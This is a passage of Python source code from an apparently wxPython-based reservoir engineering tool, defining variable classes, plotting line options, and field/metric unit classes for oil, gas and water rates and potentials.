        self._water_gas_ratio = WaterGasRatio(unit_system)
        self._oil_gas_ratio = OilGasRatio(unit_system)
        self._total_gas_liquid_ratio = TotalGasLiquidRatio(unit_system)
        # uptimes
        self._production_uptime = ProductionUptime(unit_system)
        self._lift_gas_uptime = LiftGasUptime(unit_system)
        self._gas_injection_uptime = GasInjectionUptime(unit_system)
        self._water_injection_uptime = WaterInjectionUptime(unit_system)
        # user-defined summary variables
        self._summaries = {}
        # non-simulation dependent -------------------------------------------------------------------------------------
        # wells
        self._well_spacing = WellSpacing(unit_system)
        # reservoir fluids
        self._bo = OilFVF(unit_system)
        self._bg = GasFVF(unit_system)
        self._bw = WaterFVF(unit_system)
        self._rs = SolutionGasOilRatio(unit_system)
        # injection fluids
        self._bg_inj = InjectionGasFVF(unit_system)
        self._bw_inj = InjectionWaterFVF(unit_system)
        # facilities
        self._availability = Availability(unit_system)
        self._tglr = TargetGasLiquidRatio(unit_system)
        self._wag_cycle = WAGCycleDuration(unit_system)
        self._wag_cycles = WAGCycles(unit_system)
        self._voidage_ratio = TargetVoidageRatio(unit_system)
        # constraints
        self._oil_constraint = OilConstraint(unit_system)
        self._gas_constraint = GasConstraint(unit_system)
        self._water_constraint = WaterConstraint(unit_system)
        self._liquid_constraint = LiquidConstraint(unit_system)
        self._gas_inj_constraint = InjectionGasConstraint(unit_system)
        self._water_inj_constraint = InjectionWaterConstraint(unit_system)
        self._gas_lift_constraint = LiftGasConstraint(unit_system)
        # volumes
        self._stoiip = STOIIP(unit_system)
        # risking
        self._maturity = Maturity(unit_system)
        self._pos = ProbabilityOfSuccess(unit_system)
        # scalers
        self._s_cum = CumulativeScaler(unit_system)
        self._s_rate = RateScaler(unit_system)
        self._s_ffw = FFWScaler(unit_system)
        self._s_ffg = FFGScaler(unit_system)
        self._onset = OnsetScaler(unit_system)
        self._wct_ini = InitialWCTScaler(unit_system)
        # statics TODO: Change to a dictionary and let user fill with only useful parameters
        self._length = CompletedLength(unit_system)
        self._hcft = HydrocarbonFeet(unit_system)
        self._hcpv = HydrocarbonPoreVolume(unit_system)
        self._permeability = Permeability(unit_system)
        self._oil_density = OilDensity(unit_system)
        # correlation matrix for the scalers and static parameters -----------------------------------------------------
        self._correlation_labels = []
        self._correlation_matrix = []
        self.InitialiseCorrelationMatrix()

    def AddCorrelation(self, variable):
        """Grow the correlation matrix by one row/column for ``variable``.

        New off-diagonal entries are 0 (uncorrelated), the new diagonal
        entry is 1, and the variable's menu label is appended to the axis
        labels.
        """
        if self._correlation_matrix:
            for row in self._correlation_matrix:
                row.append(0.)
        self._correlation_matrix.append([0.] * (len(self._correlation_matrix) + 1))
        self._correlation_matrix[-1][-1] = 1.
        self._correlation_labels.append(variable.GetMenuLabel())

    def AddSummary(self, summary):
        """Register a summary variable under a freshly generated unique id."""
        id_ = self.GetUniqueSummaryId()
        summary.SetId(id_)
        self._summaries[id_] = summary

    def DeleteSummary(self, id_):
        """Remove the summary variable with the given id."""
        del self._summaries[id_]

    def Get(self, type_, id_=None):
        """Return values from the ``_<type_>`` container, or one entry by id.

        NOTE(review): the id_ is None branch calls ``.values()``, so it only
        works for dict-backed attributes such as ``_summaries`` -- verify
        callers never pass a non-dict type here.
        """
        if id_ is None:
            return list(getattr(self, '_{}'.format(type_)).values())
        else:
            return getattr(self, '_{}'.format(type_))[id_]

    def GetAllVariables(self):
        """Return every variable attribute (sorted), excluding correlation data."""
        return GetAttributes(self, exclude=('_correlation_labels', '_correlation_matrix'), sort=True)

    def GetCorrelationMatrix(self):
        """Return the correlation matrix together with its axis labels."""
        return self._correlation_matrix, self._correlation_labels

    def GetSummaries(self):
        """Return all registered summary variables."""
        return self._summaries.values()

    def GetVariable(self, id_):
        """Return the variable with attribute name ``_<id_>``, falling back to
        the summaries dict for summary ids."""
        attr = '_{}'.format(id_)
        if hasattr(self, attr):
            return getattr(self, attr)
        else:
            return self._summaries[id_]

    def GetVariables(self, ids):
        """Return the variables for each id in ``ids``, in order."""
        return [self.GetVariable(id_) for id_ in ids]

    def GetUniqueSummaryId(self):
        """Return an unused summary id (max existing id + 1, or 0 if none)."""
        ids = self._summaries.keys()
        if not ids:
            return 0
        else:
            return max(ids) + 1

    def InitialiseCorrelationMatrix(self):
        """Seed the correlation matrix with every static and scaler variable."""
        attrs = GetAttributes(self, exclude=('_summaries', '_correlation_labels', '_correlation_matrix'), attr_only=True, sort=True)
        for attr in attrs:
            if attr.IsStatic() or attr.IsScaler():
                self.AddCorrelation(attr)

    def SetCorrelationMatrix(self, correlation_matrix):
        """Replace the correlation matrix (labels are kept as-is)."""
        self._correlation_matrix = correlation_matrix
# ======================================================================================================================
# Generic Variables
# ======================================================================================================================
class Variable:
    """Base class describing one displayable/plotable quantity.

    Bundles the unit, GUI labels, images, plot styling and the python type
    (``_pytype``) used to convert values to and from wx controls via
    :meth:`ToFrame` / :meth:`FromFrame`.

    NOTE(review): several methods reference ``wx`` (wx.Colour, wx.NullBitmap,
    wx.DateTime) which is not imported explicitly in the visible imports --
    presumably provided by the ``from _ids import *`` star import; verify.
    """

    def __init__(self):
        self._unit = None            # subclass of class Unit
        self._frame_label = None     # label shown on wx.Frames
        self._menu_label = None      # label shown in treectrls
        self._image = None           # PyEmbeddedImage shown in trees, etc.
        self._choices = None         # list of strings, which can be given as input to wx.Choice, etc.
        self._choice_images = None   # list of PyEmbeddedImage which can be passed to bitmapcombobox
        self._client_data_map = None  # dictionary of client_data for each index in bitmapcombobox
        self._limits = (None, None)  # limiting values for input and on plot axis'

        # plot options
        self._line_options = None    # class of LineOptions
        self._fitted_options = None  # class of FittedDataOptions
        self._legend = None          # string, used for bar and bubble charts

        # axis options (plotting)
        self._plot_label = None      # label shown in Matplotlib plots
        self._is_date = False        # required for plotting of dates

        # to and from Frame options
        self._round_off = None       # round-off used for wx.Frame displays of variables (if pytype is float)
        self._pytype = None          # python-type

        # tooltip
        self._tooltip = None         # str, tooltip to be displayed on hover

        # variable management
        self._type = None            # str
        self._id = None              # str, allows access to variable_mgr via getattr(self, id_)
        self._type_id = None         # int, id to test against
        self._image_key = None

    def FromFrame(self, value):
        """Convert a value received from a wx control to its Python
        representation, dispatching on the declared ``_pytype``."""
        if self._pytype is not str and value == '':
            return None
        elif self._pytype is bool:
            return value
        elif self._pytype is float:
            return float(value)
        elif self._pytype is int:
            return int(value)
        elif self._pytype is date:
            return wxdate2pydate(value)
        elif self._pytype is str:
            return str(value)
        elif (self._pytype is list) or (self._pytype is tuple):
            if value == -1:  # default selection in a combobox/choice
                return None
            else:
                return value
        elif self._pytype is Pointer:
            return value
        elif self._pytype is Index:
            return value
        elif self._pytype is wx.Colour:
            return value

    def GetAttribute(self):
        """Return the attribute name ('_<type>') used on VariableManager."""
        return '_{}'.format(self._type)

    def GetBitmap(self):
        """Return the image's bitmap, or wx.NullBitmap when no image is set."""
        if self._image is not None:
            return self._image.GetBitmap()
        else:
            return wx.NullBitmap

    def GetImage(self):
        """Return the raw PyEmbeddedImage (may be None)."""
        return self._image

    def GetChoices(self, idx=None):
        """Return all choices (None mapped to ''), or the choice at idx."""
        if idx is None:
            return [choice if choice is not None else '' for choice in self._choices]
        else:
            return self._choices[idx]

    def GetChoiceBitmaps(self):
        """Return a bitmap per choice image, substituting wx.NullBitmap for None."""
        return [image.GetBitmap() if (image is not None) else wx.NullBitmap for image in self._choice_images]

    def GetClientDataMap(self):
        return self._client_data_map

    def GetComboLabel(self):
        """Return the label used in combo boxes (the frame label, no colon)."""
        return self._frame_label

    def GetFittedOptions(self):
        return self._fitted_options

    def GetFrameLabel(self, idx=None):
        """Return the frame label(s) suffixed with ':'.

        With a tuple label and no idx, yields one ':'-suffixed label per
        entry; otherwise returns a single label or None when unset.
        """
        if isinstance(self._frame_label, tuple) and idx is None:
            return ('{}:'.format(l) for l in self._frame_label)

        if idx is None:
            if self._frame_label is None:
                return None

            label = self._frame_label
        else:
            if self._frame_label[idx] is None:
                return None

            label = self._frame_label[idx]

        return '{}:'.format(label)

    def GetId(self):
        return self._id

    def GetImageKey(self):
        return self._image_key

    def GetLabel(self):
        return self._frame_label

    def GetLegend(self):
        return self._legend

    def GetLimits(self):
        return self._limits

    def GetLineOptions(self):
        return self._line_options

    def GetMenuLabel(self):
        return self._menu_label

    def GetPlotLabel(self):
        """Return the label stored on the line options (used in plots)."""
        return self._line_options.GetLabel()

    def GetToolTip(self):
        return self._tooltip

    def GetType(self):
        return self._type

    def GetTypeId(self):
        return self._type_id

    def GetUnit(self, idx=None):
        """Return the unit string (via Unit.Get()) or the raw str/tuple unit.

        With idx, the unit is taken from the idx-th entry of a unit sequence.
        """
        if idx is None:
            unit = self._unit
        else:
            unit = self._unit[idx]

        if unit is None or isinstance(unit, str) or isinstance(unit, tuple):
            return unit
        else:
            return unit.Get()

    def GetUnitClass(self):
        return self._unit

    def GetXLabel(self):
        """Return 'label [unit]' for the x-axis; units containing ^ or _ are
        wrapped in $...$ so matplotlib renders them as mathtext."""
        unit = self._unit.Get()
        if unit:
            if ('^' in unit) or ('_' in unit):
                return r'{} [${}$]'.format(self._plot_label, unit)
            else:
                return r'{} [{}]'.format(self._plot_label, unit)
        else:
            return r'{}'.format(self._plot_label)

    def GetYLabel(self, group_units=False):
        """Return 'label [unit]' for the y-axis.

        When group_units is True the unit class' shared label is used instead
        of this variable's plot label; an empty unit renders as '[-]'.
        """
        if group_units:
            label = self._unit.GetLabel()
        else:
            label = self._plot_label

        unit = self._unit.Get()

        if ('^' in unit) or ('_' in unit):
            unit_label = r'[${}$]'.format(unit)
        elif unit == '':
            unit_label = r'[-]'
        else:
            unit_label = r'[{}]'.format(unit)

        return r'{} {}'.format(label, unit_label)

    def IsDate(self):
        return self._is_date

    def IsScaler(self):
        return self.IsType('scalers')

    def IsStatic(self):
        return self.IsType('statics')

    def IsSummary(self):
        return self.IsType('summaries')

    def IsType(self, type_):
        return self._type == type_

    def SetBitmap(self, bitmap):
        # NOTE(review): _bitmap is not initialized in __init__ and is not read
        # anywhere in this class -- verify this setter is still used.
        self._bitmap = bitmap

    def SetImage(self, image_key=None):
        # NOTE(review): the image_key parameter is ignored here (the id is
        # used instead); the Summary subclass overrides this to use it.
        self._image_key = self._id

    def SetUnit(self, unit_system):
        # intentionally a no-op in the base class; subclasses override
        pass

    def SetUnitClass(self, unit_class):
        self._unit = unit_class

    def ToFrame(self, value):
        """Convert a Python value to its wx-control representation (inverse
        of :meth:`FromFrame`), dispatching on the declared ``_pytype``."""
        if ((self._pytype is float) or (self._pytype is int)) and value is None:
            return ''
        elif self._pytype is bool:
            return value
        elif self._pytype is float:
            return str(round(value, self._round_off))
        elif self._pytype is int:
            return str(value)
        elif self._pytype is date:
            if value is None:  # occurs on first load
                return wx.DateTime.Now()
            else:
                return pydate2wxdate(value)
        elif self._pytype is str:
            if value is None:
                return ''
            else:
                return str(value)
        elif (self._pytype is list) or (self._pytype is tuple):
            if value is None:  # default selection in a combobox/choice
                return -1
            else:
                return value
        elif self._pytype is Pointer:
            return value
        elif self._pytype is Index:
            if value is None:  # default selection in a RadioBoxes
                return 0
            else:
                return value
        elif self._pytype is wx.Colour:
            return value
class VariableCollection:
    """An ordered group of Variable objects with list-style accessors."""

    def __init__(self, *variables):
        """Collect the given variables, preserving their order."""
        self._variables = []
        self.AddVariables(*variables)

    def AddVariable(self, variable):
        """Append a single variable to the collection."""
        self._variables.append(variable)

    def AddVariables(self, *variables):
        """Append each of the given variables in turn."""
        for item in variables:
            self.AddVariable(item)

    def GetChoiceBitmaps(self):
        """Return the bitmap of every variable, in collection order."""
        return [item.GetBitmap() for item in self._variables]

    def GetChoices(self):
        """Return the combo-box label of every variable."""
        return [item.GetComboLabel() for item in self._variables]

    def GetFrameLabel(self, idx=None):
        """Return all frame labels, or only the one for the variable at idx."""
        if idx is not None:
            return self._variables[idx].GetFrameLabel()
        return [item.GetFrameLabel() for item in self._variables]

    def GetUnit(self, idx=None):
        """Return all units, or only the unit of the variable at idx."""
        if idx is not None:
            return self._variables[idx].GetUnit()
        return [item.GetUnit() for item in self._variables]

    def GetVariables(self):
        """Return the underlying list of variables."""
        return self._variables
class Summary(Variable):
    """A user-defined summary variable computed from a simulation profile."""

    def __init__(self):
        super().__init__()
        self._image_key = None
        # behaves like an Entity: the calculation lives in the property object
        self._properties = SummaryProperty()
        self._type = 'summaries'
        self._type_id = ID_SUMMARY

    def Calculate(self, profile, *args):
        """Delegate the calculation to the underlying SummaryProperty."""
        return self._properties.Calculate(profile, *args)

    def GetImageKey(self):
        """Return the key identifying this summary's image."""
        return self._image_key

    def GetProperties(self):
        """Return the SummaryProperty backing this summary."""
        return self._properties

    def ReplaceInformation(self, variable, image):
        """Copy image, unit class, properties and labels from ``variable``."""
        self._image = image
        self._unit = variable.GetUnitClass()
        self._properties = variable.GetProperties()
        label = variable.GetMenuLabel()
        self._menu_label = label
        self._plot_label = label
        self._legend = label

    def SetId(self, id_):
        """Assign the unique id handed out by the VariableManager."""
        self._id = id_

    def SetImage(self, image_key=None):
        """Store the image key and use it directly as the image."""
        self._image_key = image_key
        self._image = image_key

    def SetLabels(self, label):
        """Use the same text for menu label, plot label and legend."""
        self._menu_label = label
        self._plot_label = label
        self._legend = label
# ======================================================================================================================
# Types used to test against in ToFrame and FromFrame
# ======================================================================================================================
class Pointer:
    """
    Marker type for controls that allow insert via an arrow or other means.
    """
class Index:
    """
    Marker type for transfer to and from RadioBox (which requires 0 as
    default, unlike bitmapcombobox which requires -1).
    """
# ======================================================================================================================
# Plotting options for plotable variables
# ======================================================================================================================
class LineOptions:
    """Matplotlib styling options for a single plotted line.

    Stores the keyword arguments forwarded to ``axes.plot`` (see :meth:`Get`)
    and converts draw-style / line-style strings to and from the combobox
    indices used by the option frames.
    """

    # index <-> string maps used by the frame-transfer methods; index -1 is
    # "no selection" in a BitmapComboBox and maps to None
    _INDEX_TO_DRAWSTYLE = {-1: None, 0: 'default', 1: 'steps-pre', 2: 'steps-mid', 3: 'steps-post'}
    _INDEX_TO_LINESTYLE = {-1: None, 0: '-', 1: '--', 2: '-.', 3: ':'}
    _DRAWSTYLE_TO_INDEX = {v: k for k, v in _INDEX_TO_DRAWSTYLE.items()}
    _LINESTYLE_TO_INDEX = {v: k for k, v in _INDEX_TO_LINESTYLE.items()}

    def __init__(self, alpha=None, colour=None, drawstyle='default', fillstyle=None, label=None, linestyle='-',
                 linewidth=None, marker=None, markersize=None):
        self._alpha = alpha            # double, [0, 1]
        self._colour = colour          # (R, G, B) normalized to [0, 1]
        self._drawstyle = drawstyle    # 'default', 'steps-{pre, mid, post}'
        self._fillstyle = fillstyle    # 'full', 'none' (additional options available)
        self._label = label            # string
        self._linestyle = linestyle    # '-', '--', '-.', ':'
        self._linewidth = linewidth    # int, primarily set through settings
        self._marker = marker          # see matplotlib documentation
        self._markersize = markersize  # int, primarily set through settings
        self._picker = 7               # sensitivity to click-events

    def Get(self):
        """Return all options as **kwargs input to a matplotlib axes.plot function."""
        return {'alpha': self._alpha,
                'color': self._colour,
                'drawstyle': self._drawstyle,
                'fillstyle': self._fillstyle,
                'label': self._label,
                'linestyle': self._linestyle,
                'linewidth': self._linewidth,
                'marker': self._marker,
                'markersize': self._markersize,
                'picker': self._picker}

    def GetAlpha(self):
        return self._alpha

    def GetColour(self):
        return self._colour

    def GetDrawstyle(self):
        """Return the combobox index of the current drawstyle.

        -1 when the drawstyle is unset (None); None for unrecognized values
        (matching the original if/elif fall-through).
        """
        return self._DRAWSTYLE_TO_INDEX.get(self._drawstyle)

    def GetLabel(self):
        return self._label

    def GetLegend(self):
        """Return a Line2D proxy carrying these options, for legend entries."""
        return Line2D([], [], **self.Get())

    def GetLinestyle(self):
        """Return the combobox index of the current linestyle.

        -1 when the linestyle is unset (None); None for unrecognized values.
        """
        return self._LINESTYLE_TO_INDEX.get(self._linestyle)

    def SetAlpha(self, alpha):
        self._alpha = alpha

    def SetColour(self, colour):
        self._colour = colour

    def SetDrawstyle(self, drawstyle):
        """Set the drawstyle from a combobox index.

        :param drawstyle: int, BitmapComboBox index; unknown indices are
            ignored (matching the original if/elif fall-through)
        """
        if drawstyle in self._INDEX_TO_DRAWSTYLE:
            self._drawstyle = self._INDEX_TO_DRAWSTYLE[drawstyle]

    def SetFillstyle(self, fillstyle):
        self._fillstyle = fillstyle

    def SetLabel(self, label):
        self._label = label

    def SetLinestyle(self, linestyle):
        """Set the linestyle from a combobox index.

        :param linestyle: int, BitmapComboBox index; unknown indices are
            ignored (matching the original if/elif fall-through)
        """
        if linestyle in self._INDEX_TO_LINESTYLE:
            self._linestyle = self._INDEX_TO_LINESTYLE[linestyle]

    def SetLinewidth(self, linewidth):
        self._linewidth = linewidth

    def SetMarker(self, marker):
        self._marker = marker

    def SetMarkerSize(self, markersize):
        self._markersize = markersize

    def Highlight(self):
        """Emphasize the line: grow the markers if any are shown, otherwise
        thicken the line.

        Fix: an unset (None) markersize/linewidth previously raised a
        TypeError ('>' / '+=' with None); None is now treated as 0.
        """
        if self._markersize and self._markersize > 0:
            self._markersize += 2
        else:
            self._linewidth = (self._linewidth or 0) + 2

    def UnHighlight(self):
        """Undo :meth:`Highlight`, shrinking markers or thinning the line."""
        if self._markersize and self._markersize > 0:
            self._markersize -= 2
        else:
            self._linewidth = (self._linewidth or 0) - 2
class FittedDataOptions(LineOptions):
    """Preset line options for overlaying fitted data: hollow circular markers, no connecting line."""
    def __init__(self, colour=None):
        super().__init__()
        self._marker = 'o'
        self._fillstyle = 'none'
        self._linewidth = 0.
        self._label = 'Fitted data'
        self._colour = colour
# ======================================================================================================================
# Units
# ======================================================================================================================
class Unit:
    """
    Base class for measurement units.

    Sub-classes assign ``self._unit`` (the unit string) and, where useful,
    ``self._label`` for grouping variables that share a unit on plots.
    """
    def __init__(self, unit_system=None):
        self._unit = None
        self._label = None  # used as label in plotting when units are grouped

    def Get(self):
        """Return the unit string (``None`` until assigned)."""
        return self._unit

    def GetLabel(self):
        """Return the grouping label (``None`` unless a sub-class sets one)."""
        return self._label

    def Set(self, unit_system):
        """Assign the unit for the given unit system; overridden in sub-classes."""
        pass
class TimeUnit(Unit):
    """Unit for elapsed time; unit-system independent, defaults to days."""
    def __init__(self, unit='days', unit_system=None):
        super().__init__()
        self._unit = unit
class DateUnit(Unit):
    """Placeholder unit for calendar dates (dimensionless)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = '-'
class LiquidFlowRateUnit(Unit):
    """Surface liquid flow rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid Flow Rate'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'Mstb/day' if unit_system == ID_UNIT_FIELD else 'm^{3}/day'
class GasFlowRateUnit(Unit):
    """Surface gas flow rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Gas Flow Rate'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'MMscf/day' if unit_system == ID_UNIT_FIELD else 'm^{3}/day'
class LiquidVolumeUnit(Unit):
    """Cumulative liquid volume."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid Volume'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'MMstb' if unit_system == ID_UNIT_FIELD else 'km^{3}'
class GasVolumeUnit(Unit):
    """Cumulative gas volume."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Gas Volume'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'Bscf' if unit_system == ID_UNIT_FIELD else 'km^{3}'
class GasLiquidRatioUnit(Unit):
    """Gas volume per liquid volume (e.g. GOR, GLR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Gas-Liquid Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'Mscf/stb' if unit_system == ID_UNIT_FIELD else 'sm^{3}/sm^{3}'
class LiquidGasRatioUnit(Unit):
    """Liquid volume per gas volume (e.g. WGR, OGR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid-Gas Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'stb/Mscf' if unit_system == ID_UNIT_FIELD else 'sm^{3}/sm^{3}'
class LiquidLiquidRatioUnit(Unit):
    """Liquid volume per liquid volume (e.g. water-cut, WOR)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid-Liquid Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'stb/stb' if unit_system == ID_UNIT_FIELD else 'sm^{3}/sm^{3}'
class LiquidVolumeRatio(Unit):
    """Reservoir-to-surface liquid volume ratio (e.g. Bo)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid Volume Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'rb/stb' if unit_system == ID_UNIT_FIELD else 'rm^{3}/sm^{3}'
class GasVolumeRatio(Unit):
    """Reservoir-to-surface gas volume ratio (e.g. Bg)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Gas Volume Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'rb/Mscf' if unit_system == ID_UNIT_FIELD else 'rm^{3}/sm^{3}'
class ReservoirVolumeRatio(Unit):
    """Reservoir-to-reservoir volume ratio."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Reservoir Volume Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'rb/rb' if unit_system == ID_UNIT_FIELD else 'rm^{3}/rm^{3}'
class LengthUnit(Unit):
    """Length."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Length'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'ft' if unit_system == ID_UNIT_FIELD else 'm'
class AreaUnit(Unit):
    """Area."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Area'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'ft^{2}' if unit_system == ID_UNIT_FIELD else 'm^{2}'
class VolumeUnit(Unit):
    """Volume."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Volume'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'stb' if unit_system == ID_UNIT_FIELD else 'm^{3}'
class PermeabilityUnit(Unit):
    """Permeability; millidarcy in both unit systems."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = 'mD'
        self._label = 'Permeability'
class DensityUnit(Unit):
    """Fluid density."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Density'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = '^{o}API' if unit_system == ID_UNIT_FIELD else 'kg/m^{3}'
class FractionUnit(Unit):
    """Dimensionless fraction."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = '-'
        self._label = 'Fraction'
class PercentageUnit(Unit):
    """Percentage."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = '%'
        self._label = 'Percentage'
class AmountUnit(Unit):
    """Count of items; no unit string."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = ''
        self._label = 'Amount'
class Unitless(Unit):
    """Dimensionless quantity; no unit string."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = ''
        self._label = 'Dimensionless'
# ======================================================================================================================
# Time Variables
# ======================================================================================================================
class DurationVariable(Variable):
    """Base class for x-axis time variables (type 'durations')."""
    def __init__(self):
        super().__init__()
        self._type = 'durations'
class Time(DurationVariable):
    """Elapsed time axis variable (non-negative)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = TimeUnit()
        self._menu_label = 'Time'
        self._plot_label = 'Time'
        self._image = ico.time_16x16
        self._limits = (0., None)
        self._id = 'time'
class Date(DurationVariable):
    """Calendar date axis variable; unbounded and flagged as a date axis."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = DateUnit()
        self._menu_label = 'Date'
        self._plot_label = 'Dates'
        self._image = ico.dates_16x16
        self._limits = (None, None)
        self._is_date = True
        self._id = 'date'
# ======================================================================================================================
# Production Potential Variables
# ======================================================================================================================
class PotentialVariable(Variable):
    """Base class for production/injection potential variables (non-negative, type 'potentials').

    Sub-classes plot with dashed lines to distinguish potentials from actual rates.
    """
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'potentials'
        self._type_id = ID_POTENTIAL
class OilPotential(PotentialVariable):
    """Oil production potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Oil production potential'
        self._image = ico.oil_rate_16x16
        self._line_options = LineOptions(label=r'Oil Pot.', colour=np.array([0., 176., 80.]) / 255., linestyle='--')
        self._plot_label = r'Oil Production Potential'
        self._id = 'oil_potential'
class GasPotential(PotentialVariable):
    """Gas production potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Gas production potential'
        self._image = ico.gas_rate_16x16
        self._line_options = LineOptions(label=r'Gas Pot.', colour=np.array([255., 0., 0.]) / 255., linestyle='--')
        self._plot_label = r'Gas Production Potential'
        self._id = 'gas_potential'
class WaterPotential(PotentialVariable):
    """Water production potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Water production potential'
        self._image = ico.water_rate_16x16
        self._line_options = LineOptions(label=r'Water Pot.', colour=np.array([91., 155., 213.]) / 255., linestyle='--')
        self._plot_label = r'Water Production Potential'
        self._id = 'water_potential'
class LiquidPotential(PotentialVariable):
    """Liquid (oil + water) production potential; also carries fitted-data overlay options."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Liquid production potential'
        self._image = ico.liquid_rate_16x16
        self._line_options = LineOptions(label=r'Liquid Pot.', colour=np.array([51., 102., 153.]) / 255., linestyle='--')
        # marker-only style used when overlaying fitted data points
        self._fitted_options = FittedDataOptions(colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Liquid Production Potential'
        self._id = 'liquid_potential'
class LiftGasPotential(PotentialVariable):
    """Lift gas injection potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Lift gas injection potential'
        self._image = ico.lift_gas_rate_16x16
        self._line_options = LineOptions(label=r'Lift Gas Pot.', colour=np.array([219., 34., 211.]) / 255., linestyle='--')
        self._plot_label = r'Lift Gas Injection Potential'
        self._id = 'lift_gas_potential'
class GasInjectionPotential(PotentialVariable):
    """Gas injection potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Gas injection potential'
        self._image = ico.gas_injection_rate_16x16
        self._line_options = LineOptions(label=r'Gas Inj. Pot.', colour=np.array([255., 0., 0.]) / 255., linestyle='--')
        self._plot_label = r'Gas Injection Potential'
        self._id = 'gas_injection_potential'
class WaterInjectionPotential(PotentialVariable):
    """Water injection potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Water injection potential'
        self._image = ico.water_injection_rate_16x16
        self._line_options = LineOptions(label=r'Water Inj. Pot.', colour=np.array([91., 155., 213.]) / 255., linestyle='--')
        self._plot_label = r'Water Injection Potential'
        self._id = 'water_injection_potential'
class TotalGasPotential(PotentialVariable):
    """Total gas (produced + lift) production potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Total gas production potential'
        self._image = ico.total_gas_rate_16x16
        self._line_options = LineOptions(label=r'Total Gas Pot.', colour=np.array([218., 119., 6.]) / 255., linestyle='--')
        self._plot_label = r'Total Gas Production Potential'
        self._id = 'total_gas_potential'
# ======================================================================================================================
# Production Rate Variables
# ======================================================================================================================
class RateVariable(Variable):
    """Base class for production/injection rate variables (non-negative, type 'rates')."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'rates'
        self._type_id = ID_RATE
class OilRate(RateVariable):
    """Oil production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Oil production rate'
        self._image = ico.oil_rate_16x16
        self._line_options = LineOptions(label=r'Oil Rate', colour=np.array([0., 176., 80.]) / 255.)
        self._plot_label = r'Oil Production Rate'
        self._id = 'oil_rate'
class GasRate(RateVariable):
    """Gas production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Gas production rate'
        self._image = ico.gas_rate_16x16
        self._line_options = LineOptions(label=r'Gas Rate', colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Gas Production Rate'
        self._id = 'gas_rate'
class WaterRate(RateVariable):
    """Water production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Water production rate'
        self._image = ico.water_rate_16x16
        self._line_options = LineOptions(label=r'Water Rate', colour=np.array([91., 155., 213.]) / 255.)
        self._plot_label = r'Water Production Rate'
        self._id = 'water_rate'
class LiquidRate(RateVariable):
    """Liquid (oil + water) production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Liquid production rate'
        self._image = ico.liquid_rate_16x16
        self._line_options = LineOptions(label=r'Liquid Rate', colour=np.array([51., 102., 153.]) / 255.)
        self._plot_label = r'Liquid Production Rate'
        self._id = 'liquid_rate'
class LiftGasRate(RateVariable):
    """Lift gas injection rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Lift gas injection rate'
        self._image = ico.lift_gas_rate_16x16
